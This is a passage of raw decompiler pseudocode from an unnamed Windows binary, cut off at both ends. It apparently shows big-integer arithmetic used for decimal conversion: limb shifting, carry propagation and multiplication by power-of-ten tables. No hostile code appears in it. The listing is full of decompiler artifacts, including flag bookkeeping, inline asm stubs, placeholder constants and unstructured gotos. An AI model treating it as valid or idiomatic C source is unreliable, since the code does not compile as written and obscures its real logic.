                										__eflags = _t1242 - 0xfffffc02;
                										if(_t1242 == 0xfffffc02) {
                											L101:
                											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
                											_t195 =  &_v1896;
                											 *_t195 = _v1896 & 0x00000000;
                											__eflags =  *_t195;
                											asm("bsr eax, eax");
                											if( *_t195 == 0) {
                												_t1081 = 0;
                												__eflags = 0;
                											} else {
                												_t1081 = _t792 + 1;
                											}
                											_t793 = 0x20;
                											_t794 = _t793 - _t1081;
                											__eflags = _t794 - 1;
                											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
                											__eflags = _t1061 - 0x73;
                											_v1865 = _t795;
                											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
                											__eflags = _t1061 - 0x73;
                											if(_t1061 != 0x73) {
                												L107:
                												_t796 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t795;
                												if(_t795 == 0) {
                													goto L107;
                												} else {
                													_t796 = 1;
                												}
                											}
                											__eflags = _t1082;
                											if(_t1082 != 0) {
                												L126:
                												_v1400 = _v1400 & 0x00000000;
                												_t224 =  &_v472;
                												 *_t224 = _v472 & 0x00000000;
                												__eflags =  *_t224;
                												E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
                												_t1276 =  &(_t1276[4]);
                											} else {
                												__eflags = _t796;
                												if(_t796 != 0) {
                													goto L126;
                												} else {
                													_t1109 = 0x72;
                													__eflags = _t1061 - _t1109;
                													if(_t1061 < _t1109) {
                														_t1109 = _t1061;
                													}
                													__eflags = _t1109 - 0xffffffff;
                													if(_t1109 != 0xffffffff) {
                														_t1260 = _t1109;
                														_t1218 =  &_v468 + _t1109 * 4;
                														_v1880 = _t1218;
                														while(1) {
                															__eflags = _t1260 - _t1061;
                															if(_t1260 >= _t1061) {
                																_t208 =  &_v1876;
                																 *_t208 = _v1876 & 0x00000000;
                																__eflags =  *_t208;
                															} else {
                																_v1876 =  *_t1218;
                															}
                															_t210 = _t1260 - 1; // 0x70
                															__eflags = _t210 - _t1061;
                															if(_t210 >= _t1061) {
                																_t1170 = 0;
                																__eflags = 0;
                															} else {
                																_t1170 =  *(_t1218 - 4);
                															}
                															_t1218 = _t1218 - 4;
                															_t972 = _v1880;
                															_t1260 = _t1260 - 1;
                															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
                															_v1880 = _t972 - 4;
                															__eflags = _t1260 - 0xffffffff;
                															if(_t1260 == 0xffffffff) {
                																break;
                															}
                															_t1061 = _v472;
                														}
                														_t1242 = _v1872;
                													}
                													__eflags = _v1865;
                													if(_v1865 == 0) {
                														_v472 = _t1109;
                													} else {
                														_t218 = _t1109 + 1; // 0x73
                														_v472 = _t218;
                													}
                												}
                											}
                											_t1194 = 1 - _t1242;
                											E00CBE920(_t1194,  &_v1396, 0, 1);
                											__eflags = 1;
                											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
                											_t805 = 0xbadbae;
                										} else {
                											_v1396 = _v1396 & 0x00000000;
                											_t1110 = 2;
                											_v1392 = 0x100000;
                											_v1400 = _t1110;
                											__eflags = _t1061 - _t1110;
                											if(_t1061 == _t1110) {
                												_t1174 = 0;
                												__eflags = 0;
                												while(1) {
                													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
                													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
                													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
                														goto L101;
                													}
                													_t1174 = _t1174 + 4;
                													__eflags = _t1174 - 8;
                													if(_t1174 != 8) {
                														continue;
                													} else {
                														_t166 =  &_v1896;
                														 *_t166 = _v1896 & 0x00000000;
                														__eflags =  *_t166;
                														asm("bsr eax, edi");
                														if( *_t166 == 0) {
                															_t1175 = 0;
                															__eflags = 0;
                														} else {
                															_t1175 = _t974 + 1;
                														}
                														_t975 = 0x20;
                														_t1261 = _t1110;
                														__eflags = _t975 - _t1175 - _t1110;
                														_t977 =  &_v460;
                														_v1880 = _t977;
                														_t1219 = _t977;
                														_t171 =  &_v1865;
                														 *_t171 = _t975 - _t1175 - _t1110 > 0;
                														__eflags =  *_t171;
                														while(1) {
                															__eflags = _t1261 - _t1061;
                															if(_t1261 >= _t1061) {
                																_t173 =  &_v1876;
                																 *_t173 = _v1876 & 0x00000000;
                																__eflags =  *_t173;
                															} else {
                																_v1876 =  *_t1219;
                															}
                															_t175 = _t1261 - 1; // 0x0
                															__eflags = _t175 - _t1061;
                															if(_t175 >= _t1061) {
                																_t1176 = 0;
                																__eflags = 0;
                															} else {
                																_t1176 =  *(_t1219 - 4);
                															}
                															_t1219 = _t1219 - 4;
                															_t981 = _v1880;
                															_t1261 = _t1261 - 1;
                															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
                															_v1880 = _t981 - 4;
                															__eflags = _t1261 - 0xffffffff;
                															if(_t1261 == 0xffffffff) {
                																break;
                															}
                															_t1061 = _v472;
                														}
                														__eflags = _v1865;
                														_t1111 = _t1110 - _v1872;
                														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
                														_t1221 = _t1111 >> 5;
                														_v1884 = _t1111;
                														_t1263 = _t1221 << 2;
                														E00CBE920(_t1221,  &_v1396, 0, _t1263);
                														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
                														_t805 = _t1221 + 1;
                													}
                													goto L128;
                												}
                											}
                											goto L101;
                										}
                										L128:
                										_v1400 = _t805;
                										_t1064 = 0x1cc;
                										_v936 = _t805;
                										__eflags = _t805 << 2;
                										E00CCAA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
                										_t1279 =  &(_t1276[7]);
                									} else {
                										_v1396 = _v1396 & 0x00000000;
                										_t1264 = 2;
                										_v1392 = 0x100000;
                										_v1400 = _t1264;
                										__eflags = _t1061 - _t1264;
                										if(_t1061 != _t1264) {
                											L53:
                											_t992 = _v1872 + 1;
                											_t993 = _t992 & 0x0000001f;
                											_t1114 = 0x20;
                											_v1876 = _t993;
                											_t1223 = _t992 >> 5;
                											_v1872 = _t1223;
                											_v1908 = _t1114 - _t993;
                											_t996 = E00CBDDA0(1, _t1114 - _t993, 0);
                											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
                											_t997 = _t996 - 1;
                											_t108 =  &_v1896;
                											 *_t108 = _v1896 & 0x00000000;
                											__eflags =  *_t108;
                											asm("bsr ecx, ecx");
                											_v1884 = _t997;
                											_v1912 =  !_t997;
                											if( *_t108 == 0) {
                												_t1117 = 0;
                												__eflags = 0;
                											} else {
                												_t1117 = _t1116 + 1;
                											}
                											_t999 = 0x20;
                											_t1000 = _t999 - _t1117;
                											_t1181 = _t1061 + _t1223;
                											__eflags = _v1876 - _t1000;
                											_v1892 = _t1181;
                											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
                											__eflags = _t1181 - 0x73;
                											_v1865 = _t1001;
                											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
                											__eflags = _t1181 - 0x73;
                											if(_t1181 != 0x73) {
                												L59:
                												_t1002 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t1001;
                												if(_t1001 == 0) {
                													goto L59;
                												} else {
                													_t1002 = 1;
                												}
                											}
                											__eflags = _t1118;
                											if(_t1118 != 0) {
                												L81:
                												__eflags = 0;
                												_t1064 = 0x1cc;
                												_v1400 = 0;
                												_v472 = 0;
                												E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
                												_t1276 =  &(_t1276[4]);
                											} else {
                												__eflags = _t1002;
                												if(_t1002 != 0) {
                													goto L81;
                												} else {
                													_t1119 = 0x72;
                													__eflags = _t1181 - _t1119;
                													if(_t1181 >= _t1119) {
                														_t1181 = _t1119;
                														_v1892 = _t1119;
                													}
                													_t1012 = _t1181;
                													_v1880 = _t1012;
                													__eflags = _t1181 - 0xffffffff;
                													if(_t1181 != 0xffffffff) {
                														_t1182 = _v1872;
                														_t1266 = _t1181 - _t1182;
                														__eflags = _t1266;
                														_t1123 =  &_v468 + _t1266 * 4;
                														_v1888 = _t1123;
                														while(1) {
                															__eflags = _t1012 - _t1182;
                															if(_t1012 < _t1182) {
                																break;
                															}
                															__eflags = _t1266 - _t1061;
                															if(_t1266 >= _t1061) {
                																_t1226 = 0;
                																__eflags = 0;
                															} else {
                																_t1226 =  *_t1123;
                															}
                															__eflags = _t1266 - 1 - _t1061;
                															if(_t1266 - 1 >= _t1061) {
                																_t1017 = 0;
                																__eflags = 0;
                															} else {
                																_t1017 =  *(_t1123 - 4);
                															}
                															_t1020 = _v1880;
                															_t1123 = _v1888 - 4;
                															_v1888 = _t1123;
                															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
                															_t1012 = _t1020 - 1;
                															_t1266 = _t1266 - 1;
                															_v1880 = _t1012;
                															__eflags = _t1012 - 0xffffffff;
                															if(_t1012 != 0xffffffff) {
                																_t1061 = _v472;
                																continue;
                															}
                															break;
                														}
                														_t1181 = _v1892;
                														_t1223 = _v1872;
                														_t1264 = 2;
                													}
                													__eflags = _t1223;
                													if(_t1223 != 0) {
                														__eflags = 0;
                														memset( &_v468, 0, _t1223 << 2);
                														_t1276 =  &(_t1276[3]);
                													}
                													__eflags = _v1865;
                													_t1064 = 0x1cc;
                													if(_v1865 == 0) {
                														_v472 = _t1181;
                													} else {
                														_v472 = _t1181 + 1;
                													}
                												}
                											}
                											_v1392 = _v1392 & 0x00000000;
                											_v1396 = _t1264;
                											_v1400 = 1;
                											_v936 = 1;
                											_push(4);
                										} else {
                											_t1127 = 0;
                											__eflags = 0;
                											while(1) {
                												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
                												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
                													goto L53;
                												}
                												_t1127 = _t1127 + 4;
                												__eflags = _t1127 - 8;
                												if(_t1127 != 8) {
                													continue;
                												} else {
                													_t1023 = _v1872 + 2;
                													_t1024 = _t1023 & 0x0000001f;
                													_t1128 = 0x20;
                													_t1129 = _t1128 - _t1024;
                													_v1888 = _t1024;
                													_t1268 = _t1023 >> 5;
                													_v1876 = _t1268;
                													_v1908 = _t1129;
                													_t1027 = E00CBDDA0(1, _t1129, 0);
                													_v1896 = _v1896 & 0x00000000;
                													_t1028 = _t1027 - 1;
                													__eflags = _t1028;
                													asm("bsr ecx, edi");
                													_v1884 = _t1028;
                													_v1912 =  !_t1028;
                													if(_t1028 == 0) {
                														_t1130 = 0;
                														__eflags = 0;
                													} else {
                														_t1130 = _t1129 + 1;
                													}
                													_t1030 = 0x20;
                													_t1031 = _t1030 - _t1130;
                													_t1184 = _t1268 + 2;
                													__eflags = _v1888 - _t1031;
                													_v1880 = _t1184;
                													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
                													__eflags = _t1184 - 0x73;
                													_v1865 = _t1032;
                													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
                													__eflags = _t1184 - 0x73;
                													if(_t1184 != 0x73) {
                														L28:
                														_t1033 = 0;
                														__eflags = 0;
                													} else {
                														__eflags = _t1032;
                														if(_t1032 == 0) {
                															goto L28;
                														} else {
                															_t1033 = 1;
                														}
                													}
                													__eflags = _t1131;
                													if(_t1131 != 0) {
                														L50:
                														__eflags = 0;
                														_t1064 = 0x1cc;
                														_v1400 = 0;
                														_v472 = 0;
                														E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
                														_t1276 =  &(_t1276[4]);
                													} else {
                														__eflags = _t1033;
                														if(_t1033 != 0) {
                															goto L50;
                														} else {
                															_t1134 = 0x72;
                															__eflags = _t1184 - _t1134;
                															if(_t1184 >= _t1134) {
                																_t1184 = _t1134;
                																_v1880 = _t1134;
                															}
                															_t1135 = _t1184;
                															_v1892 = _t1135;
                															__eflags = _t1184 - 0xffffffff;
                															if(_t1184 != 0xffffffff) {
                																_t1185 = _v1876;
                																_t1270 = _t1184 - _t1185;
                																__eflags = _t1270;
                																_t1043 =  &_v468 + _t1270 * 4;
                																_v1872 = _t1043;
                																while(1) {
                																	__eflags = _t1135 - _t1185;
                																	if(_t1135 < _t1185) {
                																		break;
                																	}
                																	__eflags = _t1270 - _t1061;
                																	if(_t1270 >= _t1061) {
                																		_t1232 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1232 =  *_t1043;
                																	}
                																	__eflags = _t1270 - 1 - _t1061;
                																	if(_t1270 - 1 >= _t1061) {
                																		_t1045 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1045 =  *(_v1872 - 4);
                																	}
                																	_t1140 = _v1892;
                																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
                																	_t1135 = _t1140 - 1;
                																	_t1270 = _t1270 - 1;
                																	_t1043 = _v1872 - 4;
                																	_v1892 = _t1135;
                																	_v1872 = _t1043;
                																	__eflags = _t1135 - 0xffffffff;
                																	if(_t1135 != 0xffffffff) {
                																		_t1061 = _v472;
                																		continue;
                																	}
                																	break;
                																}
                																_t1184 = _v1880;
                																_t1268 = _v1876;
                															}
                															__eflags = _t1268;
                															if(_t1268 != 0) {
                																__eflags = 0;
                																memset( &_v468, 0, _t1268 << 2);
                																_t1276 =  &(_t1276[3]);
                															}
                															__eflags = _v1865;
                															_t1064 = 0x1cc;
                															if(_v1865 == 0) {
                																_v472 = _t1184;
                															} else {
                																_v472 = _t1184 + 1;
                															}
                														}
                													}
                													_v1392 = _v1392 & 0x00000000;
                													_t1038 = 4;
                													__eflags = 1;
                													_v1396 = _t1038;
                													_v1400 = 1;
                													_v936 = 1;
                													_push(_t1038);
                												}
                												goto L52;
                											}
                											goto L53;
                										}
                										L52:
                										_push( &_v1396);
                										_push(_t1064);
                										_push( &_v932);
                										E00CCAA64();
                										_t1279 =  &(_t1276[4]);
                									}
                									_t810 = _v1904;
                									_t1084 = 0xa;
                									_v1912 = _t1084;
                									__eflags = _t810;
                									if(_t810 < 0) {
                										_t811 =  ~_t810;
                										_t812 = _t811 / _t1084;
                										_v1880 = _t812;
                										_t1085 = _t811 % _t1084;
                										_v1884 = _t1085;
                										__eflags = _t812;
                										if(_t812 == 0) {
                											L249:
                											__eflags = _t1085;
                											if(_t1085 != 0) {
                												_t849 =  *(0xcd6a9c + _t1085 * 4);
                												_v1896 = _t849;
                												__eflags = _t849;
                												if(_t849 == 0) {
                													L260:
                													__eflags = 0;
                													_push(0);
                													_v472 = 0;
                													_v2408 = 0;
                													goto L261;
                												} else {
                													__eflags = _t849 - 1;
                													if(_t849 != 1) {
                														_t1096 = _v472;
                														__eflags = _t1096;
                														if(_t1096 != 0) {
                															_t1201 = 0;
                															_t1250 = 0;
                															__eflags = 0;
                															do {
                																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
                																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
                																_t849 = _v1896;
                																asm("adc edx, 0x0");
                																_t1250 = _t1250 + 1;
                																_t1201 = _t1155;
                																__eflags = _t1250 - _t1096;
                															} while (_t1250 != _t1096);
                															__eflags = _t1201;
                															if(_t1201 != 0) {
                																_t856 = _v472;
                																__eflags = _t856 - 0x73;
                																if(_t856 >= 0x73) {
                																	goto L260;
                																} else {
                																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
                																	_v472 = _v472 + 1;
                																}
                															}
                														}
                													}
                												}
                											}
                										} else {
                											do {
                												__eflags = _t812 - 0x26;
                												if(_t812 > 0x26) {
                													_t812 = 0x26;
                												}
                												_t1097 =  *(0xcd6a06 + _t812 * 4) & 0x000000ff;
                												_v1872 = _t812;
                												_v1400 = ( *(0xcd6a06 + _t812 * 4) & 0x000000ff) + ( *(0xcd6a07 + _t812 * 4) & 0x000000ff);
                												E00CBE920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
                												_t867 = E00CBEA80( &(( &_v1396)[_t1097]), 0xcd6100 + ( *(0xcd6a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xcd6a07 + _t812 * 4) & 0x000000ff) << 2);
                												_t1098 = _v1400;
                												_t1279 =  &(_t1279[6]);
                												_v1892 = _t1098;
                												__eflags = _t1098 - 1;
                												if(_t1098 > 1) {
                													__eflags = _v472 - 1;
                													if(_v472 > 1) {
                														__eflags = _t1098 - _v472;
                														_t1204 =  &_v1396;
                														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
                														__eflags = _t868;
                														if(_t868 != 0) {
                															_t1156 =  &_v468;
                														} else {
                															_t1204 =  &_v468;
                															_t1156 =  &_v1396;
                														}
                														_v1908 = _t1156;
                														__eflags = _t868;
                														if(_t868 == 0) {
                															_t1098 = _v472;
                														}
                														_v1876 = _t1098;
                														__eflags = _t868;
                														if(_t868 != 0) {
                															_v1892 = _v472;
                														}
                														_t1157 = 0;
                														_t1252 = 0;
                														_v1864 = 0;
                														__eflags = _t1098;
                														if(_t1098 == 0) {
                															L243:
                															_v472 = _t1157;
                															_t870 = _t1157 << 2;
                															__eflags = _t870;
                															_push(_t870);
                															_t871 =  &_v1860;
                															goto L244;
                														} else {
                															_t1205 = _t1204 -  &_v1860;
                															__eflags = _t1205;
                															_v1928 = _t1205;
                															do {
                																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
                																_v1896 = _t878;
                																__eflags = _t878;
                																if(_t878 != 0) {
                																	_t879 = 0;
                																	_t1206 = 0;
                																	_t1099 = _t1252;
                																	_v1888 = 0;
                																	__eflags = _v1892;
                																	if(_v1892 == 0) {
                																		L240:
                																		__eflags = _t1099 - 0x73;
                																		if(_t1099 == 0x73) {
                																			goto L258;
                																		} else {
                																			_t1205 = _v1928;
                																			_t1098 = _v1876;
                																			goto L242;
                																		}
                																	} else {
                																		while(1) {
                																			__eflags = _t1099 - 0x73;
                																			if(_t1099 == 0x73) {
                																				goto L235;
                																			}
                																			__eflags = _t1099 - _t1157;
                																			if(_t1099 == _t1157) {
                																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
                																				_t891 = _t879 + 1 + _t1252;
                																				__eflags = _t891;
                																				_v1864 = _t891;
                																				_t879 = _v1888;
                																			}
                																			_t886 =  *(_v1908 + _t879 * 4);
                																			asm("adc edx, 0x0");
                																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
                																			asm("adc edx, 0x0");
                																			_t879 = _v1888 + 1;
                																			_t1099 = _t1099 + 1;
                																			_v1888 = _t879;
                																			_t1206 = _t886 * _v1896 >> 0x20;
                																			_t1157 = _v1864;
                																			__eflags = _t879 - _v1892;
                																			if(_t879 != _v1892) {
                																				continue;
                																			} else {
                																				goto L235;
                																			}
                																			while(1) {
                																				L235:
                																				__eflags = _t1206;
                																				if(_t1206 == 0) {
                																					goto L240;
                																				}
                																				__eflags = _t1099 - 0x73;
                																				if(_t1099 == 0x73) {
                																					goto L258;
                																				} else {
                																					__eflags = _t1099 - _t1157;
                																					if(_t1099 == _t1157) {
                																						_t558 = _t1273 + _t1099 * 4 - 0x740;
                																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
                																						__eflags =  *_t558;
                																						_t564 = _t1099 + 1; // 0x1
                																						_v1864 = _t564;
                																					}
                																					_t884 = _t1206;
                																					_t1206 = 0;
                																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
                																					_t1157 = _v1864;
                																					asm("adc edi, edi");
                																					_t1099 = _t1099 + 1;
                																					continue;
                																				}
                																				goto L246;
                																			}
                																			goto L240;
                																		}
                																		goto L235;
                																	}
                																} else {
                																	__eflags = _t1252 - _t1157;
                																	if(_t1252 == _t1157) {
                																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
                																		_t526 = _t1252 + 1; // 0x1
                																		_t1157 = _t526;
                																		_v1864 = _t1157;
                																	}
                																	goto L242;
                																}
                																goto L246;
                																L242:
                																_t1252 = _t1252 + 1;
                																__eflags = _t1252 - _t1098;
                															} while (_t1252 != _t1098);
                															goto L243;
                														}
                													} else {
                														_t1207 = _v468;
                														_v472 = _t1098;
                														E00CCAA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
                														_t1279 =  &(_t1279[4]);
                														__eflags = _t1207;
                														if(_t1207 == 0) {
                															goto L203;
                														} else {
                															__eflags = _t1207 - 1;
                															if(_t1207 == 1) {
                																goto L245;
                															} else {
                																__eflags = _v472;
                																if(_v472 == 0) {
                																	goto L245;
                																} else {
                																	_t1100 = 0;
                																	_v1896 = _v472;
                																	_t1253 = 0;
                																	__eflags = 0;
                																	do {
                																		_t900 = _t1207;
                																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
                																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
                																		asm("adc edx, 0x0");
                																		_t1253 = _t1253 + 1;
                																		_t1100 = _t1158;
                																		__eflags = _t1253 - _v1896;
                																	} while (_t1253 != _v1896);
                																	goto L208;
                																}
                															}
                														}
                													}
                												} else {
                													_t1208 = _v1396;
                													__eflags = _t1208;
                													if(_t1208 != 0) {
                														__eflags = _t1208 - 1;
                														if(_t1208 == 1) {
                															goto L245;
                														} else {
                															__eflags = _v472;
                															if(_v472 == 0) {
                																goto L245;
                															} else {
                																_t1101 = 0;
                																_v1896 = _v472;
                																_t1254 = 0;
                																__eflags = 0;
                																do {
                																	_t905 = _t1208;
                																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
                																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
                																	asm("adc edx, 0x0");
                																	_t1254 = _t1254 + 1;
                																	_t1101 = _t1159;
                																	__eflags = _t1254 - _v1896;
                																} while (_t1254 != _v1896);
                																L208:
                																__eflags = _t1100;
                																if(_t1100 == 0) {
                																	goto L245;
                																} else {
                																	_t903 = _v472;
                																	__eflags = _t903 - 0x73;
                																	if(_t903 >= 0x73) {
                																		L258:
                																		_v2408 = 0;
                																		_v472 = 0;
                																		E00CCAA64( &_v468, _t1064,  &_v2404, 0);
                																		_t1279 =  &(_t1279[4]);
                																		_t874 = 0;
                																	} else {
                																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
                																		_v472 = _v472 + 1;
                																		goto L245;
                																	}
                																}
                															}
                														}
                													} else {
                														L203:
                														_v2408 = 0;
                														_v472 = 0;
                														_push(0);
                														_t871 =  &_v2404;
                														L244:
                														_push(_t871);
                														_push(_t1064);
                														_push( &_v468);
                														E00CCAA64();
                														_t1279 =  &(_t1279[4]);
                														L245:
                														_t874 = 1;
                													}
                												}
                												L246:
                												__eflags = _t874;
                												if(_t874 == 0) {
                													_v2408 = _v2408 & 0x00000000;
                													_v472 = _v472 & 0x00000000;
                													_push(0);
                													L261:
                													_push( &_v2404);
                													_t852 =  &_v468;
                													goto L262;
                												} else {
                													goto L247;
                												}
                												goto L263;
                												L247:
                												_t812 = _v1880 - _v1872;
                												__eflags = _t812;
                												_v1880 = _t812;
                											} while (_t812 != 0);
                											_t1085 = _v1884;
                											goto L249;
                										}
                									} else {
                										_t908 = _t810 / _t1084;
                										_v1908 = _t908;
                										_t1102 = _t810 % _t1084;
                										_v1896 = _t1102;
                										__eflags = _t908;
                										if(_t908 == 0) {
                											L184:
                											__eflags = _t1102;
                											if(_t1102 != 0) {
                												_t1209 =  *(0xcd6a9c + _t1102 * 4);
                												__eflags = _t1209;
                												if(_t1209 != 0) {
                													__eflags = _t1209 - 1;
                													if(_t1209 != 1) {
                														_t909 = _v936;
                														_v1896 = _t909;
                														__eflags = _t909;
                														if(_t909 != 0) {
                															_t1255 = 0;
                															_t1103 = 0;
                															__eflags = 0;
                															do {
                																_t910 = _t1209;
                																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
                																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
                																asm("adc edx, 0x0");
                																_t1103 = _t1103 + 1;
                																_t1255 = _t1163;
                																__eflags = _t1103 - _v1896;
                															} while (_t1103 != _v1896);
                															__eflags = _t1255;
                															if(_t1255 != 0) {
                																_t913 = _v936;
                																__eflags = _t913 - 0x73;
                																if(_t913 >= 0x73) {
                																	goto L186;
                																} else {
                																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
                																	_v936 = _v936 + 1;
                																}
                															}
                														}
                													}
                												} else {
                													L186:
                													_v2408 = 0;
                													_v936 = 0;
                													_push(0);
                													goto L190;
                												}
                											}
                										} else {
                											do {
                												__eflags = _t908 - 0x26;
                												if(_t908 > 0x26) {
                													_t908 = 0x26;
                												}
                												_t1104 =  *(0xcd6a06 + _t908 * 4) & 0x000000ff;
                												_v1888 = _t908;
                												_v1400 = ( *(0xcd6a06 + _t908 * 4) & 0x000000ff) + ( *(0xcd6a07 + _t908 * 4) & 0x000000ff);
                												E00CBE920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
                												_t926 = E00CBEA80( &(( &_v1396)[_t1104]), 0xcd6100 + ( *(0xcd6a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xcd6a07 + _t908 * 4) & 0x000000ff) << 2);
                												_t1105 = _v1400;
                												_t1279 =  &(_t1279[6]);
                												_v1892 = _t1105;
                												__eflags = _t1105 - 1;
                												if(_t1105 > 1) {
                													__eflags = _v936 - 1;
                													if(_v936 > 1) {
                														__eflags = _t1105 - _v936;
                														_t1212 =  &_v1396;
                														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
                														__eflags = _t927;
                														if(_t927 != 0) {
                															_t1164 =  &_v932;
                														} else {
                															_t1212 =  &_v932;
                															_t1164 =  &_v1396;
                														}
                														_v1876 = _t1164;
                														__eflags = _t927;
                														if(_t927 == 0) {
                															_t1105 = _v936;
                														}
                														_v1880 = _t1105;
                														__eflags = _t927;
                														if(_t927 != 0) {
                															_v1892 = _v936;
                														}
                														_t1165 = 0;
                														_t1257 = 0;
                														_v1864 = 0;
                														__eflags = _t1105;
                														if(_t1105 == 0) {
                															L177:
                															_v936 = _t1165;
                															_t929 = _t1165 << 2;
                															__eflags = _t929;
                															goto L178;
                														} else {
                															_t1213 = _t1212 -  &_v1860;
                															__eflags = _t1213;
                															_v1928 = _t1213;
                															do {
                																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
                																_v1884 = _t937;
                																__eflags = _t937;
                																if(_t937 != 0) {
                																	_t938 = 0;
                																	_t1214 = 0;
                																	_t1106 = _t1257;
                																	_v1872 = 0;
                																	__eflags = _v1892;
                																	if(_v1892 == 0) {
                																		L174:
                																		__eflags = _t1106 - 0x73;
                																		if(_t1106 == 0x73) {
                																			goto L187;
                																		} else {
                																			_t1213 = _v1928;
                																			_t1105 = _v1880;
                																			goto L176;
                																		}
                																	} else {
                																		while(1) {
                																			__eflags = _t1106 - 0x73;
                																			if(_t1106 == 0x73) {
                																				goto L169;
                																			}
                																			__eflags = _t1106 - _t1165;
                																			if(_t1106 == _t1165) {
                																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
                																				_t950 = _t938 + 1 + _t1257;
                																				__eflags = _t950;
                																				_v1864 = _t950;
                																				_t938 = _v1872;
                																			}
                																			_t945 =  *(_v1876 + _t938 * 4);
                																			asm("adc edx, 0x0");
                																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
                																			asm("adc edx, 0x0");
                																			_t938 = _v1872 + 1;
                																			_t1106 = _t1106 + 1;
                																			_v1872 = _t938;
                																			_t1214 = _t945 * _v1884 >> 0x20;
                																			_t1165 = _v1864;
                																			__eflags = _t938 - _v1892;
                																			if(_t938 != _v1892) {
                																				continue;
                																			} else {
                																				goto L169;
                																			}
                																			while(1) {
                																				L169:
                																				__eflags = _t1214;
                																				if(_t1214 == 0) {
                																					goto L174;
                																				}
                																				__eflags = _t1106 - 0x73;
                																				if(_t1106 == 0x73) {
                																					L187:
                																					__eflags = 0;
                																					_v2408 = 0;
                																					_v936 = 0;
                																					_push(0);
                																					_t940 =  &_v2404;
                																					goto L188;
                																				} else {
                																					__eflags = _t1106 - _t1165;
                																					if(_t1106 == _t1165) {
                																						_t370 = _t1273 + _t1106 * 4 - 0x740;
                																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
                																						__eflags =  *_t370;
                																						_t376 = _t1106 + 1; // 0x1
                																						_v1864 = _t376;
                																					}
                																					_t943 = _t1214;
                																					_t1214 = 0;
                																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
                																					_t1165 = _v1864;
                																					asm("adc edi, edi");
                																					_t1106 = _t1106 + 1;
                																					continue;
                																				}
                																				goto L181;
                																			}
                																			goto L174;
                																		}
                																		goto L169;
                																	}
                																} else {
                																	__eflags = _t1257 - _t1165;
